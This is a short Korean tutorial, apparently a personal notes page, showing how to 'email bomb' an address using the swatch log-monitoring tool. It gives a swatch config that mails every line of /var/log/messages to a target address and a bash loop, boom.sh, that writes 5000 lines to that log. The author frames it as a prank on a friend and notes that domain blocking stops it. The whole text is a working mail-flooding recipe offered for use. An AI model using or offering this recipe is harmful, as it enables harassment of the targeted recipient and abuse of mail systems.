Linux/Log 도구/swatch를 이용한 email Boom

Swatch 

simple log watch의 약자로 log의 특정 이벤트 발생 시 이벤트 로그를 메일로 보내는 기능을 가지고 있다. 이를 이용하여 특정 이메일로 쉘 스크립트를 통해 무한정으로 이메일을 보낼 수 있다. 

swatch 설정파일 - my.conf

watchfor    /(.*)/
echo
mail = [특정 이메일]

swatch 데몬 명령어

swatch -c my.conf -t /var/log/messages

 - /var/log/messages로 들어오는 모든 기록을 특정 이메일로 보내게 된다.

이제 /var/log/messages 로그를 남길 차례인데 간단한 쉘스크립트로 boomer를 만들 수 있다.

boom.sh

#!/bin/bash
 
for i in {1..5000}
do
    echo "Hello boom!!!!!" >> /var/log/messages
done

이 파일을 작성하고

chmod 명령을 이용해 실행 권한을 부여한다.

 > chmod 755 boom.sh

이제 swatch -c my.conf -t /var/log/messages로 데몬을 켜놓고

putty를 이용해 원격 쉘을 열어 boom.sh를 실행하면 지정한 이메일로 로그기록이 전송된다.

심각한 dos 공격은 아니지만 친구에게 장난치는 정도의 공격? ㅋㅋ...

사실 위 공격은 도메인 수신 차단을 통해서 간단하게 막을 수 있다. ㅋ ;